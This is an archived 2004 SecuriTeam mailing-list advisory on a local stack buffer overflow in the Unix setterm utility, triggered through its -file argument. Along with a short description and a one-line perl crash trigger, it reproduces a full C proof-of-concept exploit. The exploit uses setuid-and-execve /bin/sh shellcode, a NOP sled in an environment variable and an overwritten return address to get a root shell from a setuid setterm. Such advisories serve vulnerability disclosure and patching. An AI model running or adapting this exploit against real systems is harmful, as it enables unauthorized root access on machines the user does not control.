[UNIX] Setterm Local Stack Overflow Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 07/01/04
- Previous message: SecuriTeam: "[UNIX] POPclient DoS Due To An Off-By-One Overflow Condition"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 1 Jul 2004 18:05:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Setterm Local Stack Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
Setterm is "a utility that ships with many if not all UNIX and Linux
distributions that provides the user with the means to tweak and configure
the behavior of the system terminal". A local buffer overflow
vulnerability has been found in setterm. If setterm is run as suid this
could lead to privilege escalation on the system.
DETAILS
Vulnerable Systems:
* setterm, all versions
The stack overflow condition exists because the -file command line
argument passed to setterm is not properly bound checked. When it is
copied into a buffer, the vulnerability manifests itself. This can be seen
with the following simple command:
$ setterm -file `perl -e 'print "A"x249'`
Segmentation fault
For a setterm that is run as suid, this simple and classic overflow
condition can be used to escalate privileges on the system. A proof of
concept exploit code has been provided and is listed below:
/***********************************************************************
* setterm (All v3rs10nz) Proof of concept Xploit *
* *
* Author: Uz4yh4N Contact: Lord@linuxmail.org *
* *
* Tested Against Slackware and SuSe Distros. *
* *
* The bug was found 20 May 2004 03:35 *
* Gr33t1ngz Efnet folk. *
* This is a Lame stack overflow you know. But i think the Setterm *
* is an important tool. *
* And SPECIAL thanks to N4rK07IX *
* Firtina oncesi sessizlik by Uz4yh4N *
***********************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#define MAXDATA 4000
#define BEEP 1500
#define PATH "/usr/bin/setterm" // you can change this for your distro.
#define PROG "setterm"
char shelltoks[] =
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
"\x31\xdb" // xor %ebx,%ebx
"\x89\xd8" // mov %ebx,%eax
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
main()
{
char buffer[MAXDATA];
char ybuf[BEEP];
int i,
*adr_p;
printf("--> Setterm local stack overflow Proof of Concept Xploit\n");
printf("--> Author Uz4yh4N Lord@linuxmail.org\n");
memset(ybuf,0x90,sizeof(ybuf));
memcpy(&ybuf[BEEP-strlen(shelltoks)],shelltoks,strlen(shelltoks));
memcpy(ybuf,"SEXY=",5);
putenv(ybuf);
unsigned long ret = 0xBFFFFFFA - strlen(PATH) - strlen(ybuf);
printf("--> Ret address at 0x%x\n", ret);
printf("--> Evil buffer loading\n");
adr_p = (int *)(buffer);
for(i=0;i<MAXDATA;i += 4)
*adr_p++ = ret;
if(execl(PATH,PROG,"-file",buffer,NULL)== -1) {
perror("execl");
exit(-1);
}
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:lord@linuxmail.org> Orhan
BAYRAK.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] POPclient DoS Due To An Off-By-One Overflow Condition"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
